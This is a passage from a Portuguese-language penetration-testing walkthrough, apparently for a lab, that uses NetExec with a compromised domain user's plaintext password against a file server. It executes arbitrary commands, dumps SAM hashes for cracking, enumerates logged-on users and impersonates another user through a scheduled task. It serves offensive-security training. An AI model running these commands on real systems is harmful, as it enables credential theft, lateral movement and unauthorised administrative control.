File Server

  • Considerando que nosso usuário recém-comprometido tem algumas permissões especiais neste grupo de domínio, podemos revisitar o servidor de arquivos como esse novo usuário.

nxc smb 10.0.29.208 -u "benjaminm" -p "w5gzI6&xx%aBqZC^GZ"
  • Podemos fornecer comandos arbitrários que queremos executar com o -Xargumento. Vamos até validar que estamos de fato no grupo de administradores locais verificando a saída do comando:

nxc smb 10.0.29.208 -u "benjaminm" -p "w5gzI6&xx%aBqZC^GZ" -X 'net localgroup Administrators'
  • Portanto, nada nos impede de usar outras ferramentas úteis NetExec. Podemos até mesmo vasculhar o banco de dados SAM para encontrar mais hashes para crackear!

nxc smb 10.0.29.208 -u "benjaminm" -p "w5gzI6&xx%aBqZC^GZ" --sam
  • Existe até a possibilidade de procurar usuários logados, o que pode nos levar à próxima migalha de pão e peça do quebra-cabeça!

nxc smb 10.0.29.208 -u "benjaminm" -p "w5gzI6&xx%aBqZC^GZ" --loggedon-users

Impersonating an Admin

nxc smb  10.0.29.208 -u "benjaminm" -p "w5gzI6&xx%aBqZC^GZ" -M schtask_as -o USER=johna CMD=whoami

Last updated